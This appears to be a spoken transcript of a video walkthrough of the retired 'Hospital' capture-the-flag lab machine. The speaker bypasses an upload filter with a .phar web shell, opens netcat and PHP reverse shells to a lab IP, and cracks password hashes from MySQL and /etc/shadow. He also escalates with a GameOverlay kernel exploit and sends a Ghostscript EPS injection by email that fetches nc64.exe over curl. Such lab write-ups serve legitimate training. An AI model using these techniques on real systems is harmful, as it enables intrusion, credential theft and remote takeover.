All right, welcome back. Today we're going to be taking a look at hospital. It's got about an hour left, not even I don't think on it before it gets retired. I spelled hospital wrong up top, so let's go ahead and all right, there we go. All right. So as you see, I already got some stuff in here. I already did I've done this one a couple times now. We're going to remove all this stuff though, just so we can start fresh, right? So let's go ahead and start off with a rust scan here. We see that port 443 is up. We see 8080 is up. So we know there's some web stuff here. We know it's most likely Windows because we got Kerberos like right here. We have 130 or 139 and 445 up, right? So we got SMB up and running. Let's go and check out that port 80 like real quick. 8080, excuse me. And we see it's not found. It's I think it has to be hospital, whatever. But let's go ahead. Okay, location login.php. So let's go ahead and head over to login.php. Like right there. Oh, that's not what I wanted. Oh, we could do that because we'll go HTTPS hopefully, but we'll do 8080. And the rates go to our HTTPS. All right, and we get this like right here. Don't have an account. We go ahead and make one, right? So I'm just gonna say caret. Whoops. Sorry, new keyboard. And if I keep messing up, I'm just gonna keep blaming it on the keyboard, even years from now. All right, so we did that, right? So let's go ahead and log in. And once we log in, we see that we're able to upload a file, right? So when we go to browse for files, it's only wanting certain types of files. But if we try to upload, let's say a PHP, right? So let's go ahead and copy, I don't know. Let's go ahead and locate. I don't even have Pawnee Shell on here. We're going to get Pawnee Shell on here. And we're going to try to use that like right there. I don't know why I don't have it, but so we get ourselves a little web shell here. So we'll just go shell.php, right? And we can go ahead and go to raw. We'll grab this like right here. And we'll cd in my tools folder. Move shell.php to Pawnee shell.php. We'll say something like that right now. If I locate Pawnee, was that going to work? Not yet, huh? Because I had to update and everything like that, huh? So let's go ahead and we'll copy from tools. There we go. It's right here. All right, and we'll sublime that guy. Well, actually, I don't do anything with him. I forgot because he has a web shell. All right, let's go and try to upload a PHP first. So browse and see if we can't do that or not. We'll go to hospital, and it shows nothing because it wants an image file, right? Let's go to all files, and we're still seeing nothing for some reason. Oh, probably because I just moved it in there. I still need to copy it up here, huh? So there we go. All right, if we try to upload this as a PHP, we're going to get an error, right? Failed. Try setting your medical record again. Okay, so we get a failed, right? Now we can use burst fleet, something like that, or you can just try to start messing with the file, right? Maybe PHP 5, PHP 6, PHP 7, maybe far. So we're going to go ahead and we're going to move this to, we'll say shell.far. All right, and let's go try to upload that now. Let's see, go to all files. We'll say shell.far. Upload that. And that one takes, right? We get a success on that one. So let's see if it actually worked. Shell.far. Well, we got to find an uploads first, so maybe like an uploads folder or upload. We could always use a Ferox Buster to find that. Let's try uploads / shell.far. And there we go. Okay, cool. So LS-LA, and it looks like we're in Linux now, but we were looking at Windows before, right? So that's a little bit weird, right? So we're going to CD into home. All right, we see Dr. Williams there. Let's go ahead and CD back into var www.html. All right, we got htaccess, also config.php. Let's go ahead and cat that config.php file like right there. And we do see that we do have a root in the MySQL service. So we can see that we have some type of MySQL right on the back end. And since we have that, let's get a reverse shell going here. So let's go ahead and cat scripts. So we'll say netcat reverse shell. We're using netcat 1 for now. We'll do an ifconfig. Right, 10.10.14.8. So we'll go ahead and we'll grab this. Throw that in here. 10.10.14.8. And we'll list it out port 4242. Let's go ahead and start listening. Port 4242, like right there. We'll hit enter and see if we get callback, and we do. So let's go ahead and grab our full shell now. Okay, let's see if we can do anything with sudo. We cannot. All right. Let's go ahead and cat that config.php again. And let's try to get into MySQL like real quick. See if we can't find some hashes in there or something like that. Attack u root. All right. Show databases, right? Let's go ahead and use hospital. Show tables. And we'll select star from users. All right, so we got quite a few people in here, right? But we're looking at this admin or patient most likely, okay? This other test 12 one, this guy's probably somebody else here, right? That made an account on this thing or whatever. Let's go ahead and grab the admin one, okay? So we'll echo that in the hash.text. Then let's go ahead and just use John on hash.text, right? Obviously, it's going to say that because I already did it. Okay, so let's go ahead and we'll do a show. Should only take like a couple seconds. We get 1, 2, 3, 4, 5, 6. Okay, that's for admin, like right there. All right. So let's see what else we have here, right? We had that port 443 up. All right, so let's go ahead and hit home here. There we go. And there we go. Okay, let's try admin. And I guess 1, 2, 3, 4, 5, 6. We'll try that like right there. Let's see if that works. All right, nope. It looks like that login failed. Okay. Let's see if we can't crack this patient one like right here then. Actually, I'm going to take this again. I'm actually going to remove that jaw.pop file because I remember it being that easy. Oh, I don't know why I'm doing it there. Whoops. Let's go ahead and remove tech.rf hash.text. Yeah, it's definitely saying 1, 2, 3, 4, 5, 6 out for admin. All right, let's go ahead and exit out of here then. Let's see what else is on this machine. How about that? Going cat etsy password. We have a Dr. Williams out here. Maybe SU into Dr. Williams. 1, 2, 3, 4, 5, 6. Should probably also grab this patient one then too. Maybe try to crack this one. See if we can't crack this one like right here then. Still nothing over here. Okay. Oh, starting to freeze. Yep, I know. Oh boy, I know. Okay, let's go ahead and I don't know, you name tech A or something like that. Nope, just one A. Okay. Let's go ahead and do a cat /etc lsb release. See what we got here? And we have 23.04 it looks like. Let's go ahead and take that 23.04 and see if we can do something with that. Maybe we have to become root first on Linux or something like that. So let's go ahead and say 23.04 exploit Ubuntu, right? And we immediately see that's most likely game overlay, right? Which this did come out around the time this box was made. So let's go ahead and grab this exploit right here. Easy exploit to run, just a bash script, and you'll become root. Let's go and go to raw. We could actually just copy this in all honesty if we want to. We'll say Control A, copy everything. Control C. Head back over and oh man, I'm about to stop that John down there. I think it's taking up quite a bit of CPU power like right now. However, CPU is running at a good temperature, but it's taking up everything that I can. We'll let John do his thing and we'll be like right back with this. Alright, John finally stopped and we do actually get a password back. But we do have this problem in here, right? So let's go ahead and cd and temp. And we'll go we'll just do a quick nano shell.sh. Doesn't really matter what I call it. Probably should just call it root. We'll go ahead and we'll bash shell.sh. And we are now root, right? So let's go ahead and cd into root. Let's go ahead and cat that etc shadow, like real quick. And see if we can't find Dr. Williams' password. There we go. Let's go and grab this like right here. We'll echo that. And do a hash.text. We'll go ahead and we'll use John again. Oh boy, right? For hash.text, we'll see if we get anything back here. All right, we get a password back. So let's go ahead and try that maybe for the mail server that we have over here, right? Webmail, maybe Dr. Williams. And with that password that we just found like right there. Let's go and try that. All right, that one like right there did not work. But we do have a Dr. Williams now, huh? So now I'm wondering, so we have a password. We have Dr. Williams. Maybe did I not save it properly, maybe? Nope, that's definitely saved properly. Williams. Williams, yep. Try that one more time. Because for I remember, okay, cool, there we go. All right, and we're in. So now we have this needle designs for Darius Simon, right? Okay, so he wants us to, I want to remind you that the project for lighter, cheaper, environmentally friendly needles is still ongoing. You are the one in charge of providing me with the designs for these so that I can take them to 3D printing department and start producing them right away. Please make the design in an EPS file format so that it can be well visualized with GhostScript. Okay, that kind of breaks down what we're looking for, huh? Let's go ahead and look up EPS exploit, GitHub. And we find this like right here, right? GhostScript command injection. That's pretty much every single thing we want, like right there. We actually want this whole thing, all right? Because we're going to need that file, EPS, plus the Python file. So it just technically you don't need the whole thing, but we'll just go ahead and do a git clone. Let's cd into there, right? That's CVE, like right there. And we'll go ahead and we will do a quick CVE or Python. Exactly that, like right there, okay? So we're going to do a Python CVE for that Python file, like right there. We're going to inject into a EPS file, which we already have a file.eps. We'll set off a payload, okay? But this payload is actually going to be, let's go ahead and curl for something, huh? So we'll say curl HTTP 10.10.14.8. That's my IP address, right? We'll look at something like netcat64.exe. Then save that as sc64.exe. So we're going to need a Python server, so obviously up and running. All right, and we'll say to inject that file.eps. So there we go. All right, or the file is going to be that file.eps one. Let's go ahead and reply to him, this Dr. Brown, and we'll see if we get a callback on my Python server back here. And also, let's go ahead and get it to the correct location too. CD to tools, start that Python server, because that's where my nc64.exe is sitting. And we'll attach that file for file.eps. All right, and we'll send that off. Now, I did try to use wget over here at first, but it wouldn't work. So I feel like then I used curl, and curl did work for me. So we do get a 200. So that did just go up there as far as we know. It at least saw it and it found it, right? So now let's try to call for it. 10, 14, 8, port 445, tac E command prompt, right? We'll say that because we think we're in Windows again. And we'll go ahead and we'll do 445. Let's go ahead and eject that guy. And we'll set this up there again. This one right here, we'll reply to him again. We'll set up that file.eps again and try and get that call back to us. Let's go ahead and send that, and we'll see if we don't get a callback over here, or see if we get a callback and see if we can get this machine or not. And we do get a callback. That was pretty quick, right? Let's go to CD to C drive. Once we see the C drive over here, we see this XAMPP file, right? Let's go to CD to XAMPP. And we're now in XAMPP, so we can CD to HT docs. Now this is also like right where that the HTTPS site is at, right? So what we could do is we may be able to put something in here. Okay, so let's go ahead and echo, or let's get into PowerShell first. Echo test into test.txt. Okay, let's go ahead and hop back over to here. Let's try to go to this site /test.txt and see if that actually works. And it does. So we see this test like right here. So that was pretty easy. So now what we should technically be able to do is just throw a Windows PowerShell reverse shell into here and get a callback, right? So let's go ahead and do an ls-la shell. I believe I have there's a pony shell, windshell.php. There we go. So if we go ahead and we sublime text that windshell.php, and I do 10.10.14.8, that should be able to put that into there. Thus allow me really to increase my privileges, because once I get that callback for the web server, even if it seems like I'm the same privileges, I'll actually have person client after authentication. Obviously, I don't have that here, right? So let's go ahead and let's put that into here. wget http 10.10.14.8 shell.php tac O shell.php. And we know that this will work, that I can take a PHP file because the index.php is already in here, right? So it's already run off of PHP, right? Wherever that's at. And there's PHP by like right there also, things like that. But there's already an index.php in this file. So we know it can take PHP, right? We also know we can put stuff into there. All right. Windshell, huh? It should be windshell.php. I didn't do an RL wrap, did I? We can just copy right up to like right there. Windshell.php. Tac O shell.php. We'll do that one more time. All right, let's go ahead and start up a listener. RL wrap this time, right? And let's try to go to shell.php up here. And we do get a callback. Who am I? I'm NT Authority System, so obviously the XAMPP's running as NT Authority System. So now I can see the C drive, and I can technically get my root flag and everything like that. hopefully you learned something. Hopefully you liked it. I know I had a lot of fun with this box. It kind of felt like an OSCP style box to me, like maybe like one like the harder ones. But yeah, I had a lot of fun doing it. So hopefully you learned something, and I will talk to you all later.